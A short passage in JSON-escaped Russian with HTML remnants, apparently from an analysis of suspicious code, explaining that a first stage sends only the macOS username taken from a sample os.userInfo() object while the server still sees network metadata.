\u041a\u0430\u0436\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435 \u0442\u0430\u043a \u043c\u043d\u043e\u0433\u043e. os.userInfo() \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u043e\u0431\u044a\u0435\u043a\u0442:<\/p>\n
{  username: \"john\",  uid: 1000,  gid: 1000,  shell: \"\/bin\/bash\",  homedir: \"\/home\/john\"}<\/code>
<\/a><\/div><\/pre>\n
\u041d\u043e \u043d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e userInfo.username, \u0438 \u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0435\u0441\u043b\u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 macOS. \u041d\u0430 Linux\/Windows username \u043d\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f.<\/p>\n
\u0418 \u0445\u043e\u0442\u044f \u043a\u043e\u0434 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0435 \u0442\u0430\u043a \u043c\u043d\u043e\u0433\u043e, \u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u0441\u0451 \u0440\u0430\u0432\u043d\u043e \u0432\u0438\u0434\u0438\u0442 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435:<\/p>\n